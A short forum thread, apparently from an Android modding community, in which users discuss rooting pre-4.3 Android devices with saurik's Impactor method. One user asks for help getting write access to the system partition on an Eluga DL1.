bmg1001 said:
So since Google patched this in 4.3, does this mean almost all devices before 4.2.2 can be rooted with this method?
Click to expand...
Click to collapse
Yup - assuming they haven't been patched against the methods used (most haven't been).

Very interesting read. Thanks saurik & OP.

Eluga DL1
Hi there,
this post is in some ways a duplicate but different people seem to follow this thread because it is directly involving sauriks impactor.
Is there anything available that i can throw at Elugas 4.0.4 kernel to get r/w on the system partition?
I will try everything that is suggested to me.